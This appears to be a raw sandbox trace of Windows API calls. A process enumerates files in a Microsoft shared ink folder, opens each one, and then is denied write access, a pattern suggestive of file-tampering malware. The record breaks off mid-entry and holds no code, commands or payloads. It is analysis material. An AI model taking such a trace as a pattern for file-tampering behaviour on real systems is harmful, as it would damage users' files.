FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x2c6cc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="split.avi", cAlternateFileName="")) returned 1 [0082.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0082.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.724] AreFileApisANSI () returned 1 [0082.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi", lpUsedDefaultChar=0x0) returned 67 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0082.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0082.725] AreFileApisANSI () returned 1 [0082.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0082.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82298 [0082.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 67 [0082.725] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.725] GetFileType (hFile=0x340) returned 0x1 [0082.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0082.725] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.725] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.725] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.726] CloseHandle (hObject=0x340) returned 1 [0082.726] AreFileApisANSI () returned 1 [0082.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0082.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82058 [0082.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 67 [0082.726] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.726] GetLastError () returned 0x5 [0082.726] GetLastError () returned 0x5 [0082.726] SetLastError (dwErrCode=0x5) [0082.726] GetLastError () returned 0x5 [0082.726] SetLastError (dwErrCode=0x5) [0082.726] GetLastError () returned 0x5 [0082.726] SetLastError (dwErrCode=0x5) [0082.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0082.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.727] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tabskb.dll.mui", cAlternateFileName="")) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0082.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0082.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.728] AreFileApisANSI () returned 1 [0082.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0082.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0082.728] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.728] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.728] AreFileApisANSI () returned 1 [0082.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0082.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 72 [0082.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.729] GetFileType (hFile=0x340) returned 0x1 [0082.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0082.729] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.729] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.730] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.730] CloseHandle (hObject=0x340) returned 1 [0082.730] AreFileApisANSI () returned 1 [0082.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0082.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 72 [0082.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.730] GetLastError () returned 0x5 [0082.730] GetLastError () returned 0x5 [0082.730] SetLastError (dwErrCode=0x5) [0082.730] GetLastError () returned 0x5 [0082.730] SetLastError (dwErrCode=0x5) [0082.730] GetLastError () returned 0x5 [0082.730] SetLastError (dwErrCode=0x5) [0082.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0082.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0082.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.731] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da8b116, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="TabTip.exe.mui", cAlternateFileName="")) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0082.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.731] AreFileApisANSI () returned 1 [0082.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui", lpUsedDefaultChar=0x0) returned 72 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0082.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0082.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.732] AreFileApisANSI () returned 1 [0082.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0082.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui") returned 72 [0082.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.732] GetFileType (hFile=0x340) returned 0x1 [0082.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0082.732] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.732] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.733] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.733] CloseHandle (hObject=0x340) returned 1 [0082.733] AreFileApisANSI () returned 1 [0082.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0082.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui") returned 72 [0082.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.733] GetLastError () returned 0x5 [0082.733] GetLastError () returned 0x5 [0082.733] SetLastError (dwErrCode=0x5) [0082.733] GetLastError () returned 0x5 [0082.733] SetLastError (dwErrCode=0x5) [0082.733] GetLastError () returned 0x5 [0082.733] SetLastError (dwErrCode=0x5) [0082.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0082.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0082.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.733] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ffe6194, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, 